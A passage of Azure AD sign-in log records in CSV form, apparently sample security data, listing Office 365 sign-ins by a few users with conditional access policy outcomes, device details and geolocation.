{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",669c457e-4441-4eab-88a8-07b777fe1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,669c457e-4441-4eab-88a8-07b777fe1100,SigninLogs,Sucess,33.7984581,-84.38828278
+2002,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:19.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,90e24112-fff1-4ebc-a0ab-43df5a5dfed7,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",669c457e-4441-4eab-88a8-07b757ff1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,669c457e-4441-4eab-88a8-07b757ff1100,SigninLogs,Sucess,33.7984581,-84.38828278
+2003,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:35.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,271b1bb3-28da-4de2-a25c-a413aea8f5bd,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",669c457e-4441-4eab-88a8-07b7a1011200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,669c457e-4441-4eab-88a8-07b7a1011200,SigninLogs,Sucess,33.7984581,-84.38828278
+2004,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:24.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a36f5712-5714-478b-9e2f-0102b4ee9c3e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:04,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",b125da47-83a8-4791-90e4-983b0c4a1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,b125da47-83a8-4791-90e4-983b0c4a1000,SigninLogs,Sucess,33.7984581,-84.38828278
+2005,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:12.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,97c764c6-f55c-4d7c-bf25-e5947a527f36,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,CRM Power BI Integration,e64aa8bc-8eb4-40e2-898b-cf261a25954f,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:14,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",a90d7024-2f24-4b85-b726-7a3017c91100,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Common Data Service,a90d7024-2f24-4b85-b726-7a3017c91100,SigninLogs,Sucess,50.6406517,5.572050095
+2006,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:59.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,86ab6a28-c18d-4389-aeee-c4140c3ecdc8,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 15:45,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",a90d7024-2f24-4b85-b726-7a305ada1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,a90d7024-2f24-4b85-b726-7a305ada1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2007,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:24.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,462b0178-9ac6-4446-839a-1a09a98709f1,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 15:04,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",e555e9d8-8e19-4918-91cf-fdbc2ade1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e555e9d8-8e19-4918-91cf-fdbc2ade1100,SigninLogs,Sucess,33.7984581,-84.38828278
+2008,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:32.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9ddcd91f-6dfb-44fb-b724-d4bb24f5f2db,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",c95450b3-582d-4306-9dd2-9bdab89b1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c95450b3-582d-4306-9dd2-9bdab89b1300,SigninLogs,Sucess,38.73078156,-78.17196655
+2009,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:26.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,02e7351d-8e95-4d90-a971-fa054fa3cbe3,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:04,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c95450b3-582d-4306-9dd2-9bda8c221200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,c95450b3-582d-4306-9dd2-9bda8c221200,SigninLogs,Sucess,33.7984581,-84.38828278
+2010,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:33.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d0958eba-e3aa-44fb-99f1-d4d9cbb0c48d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 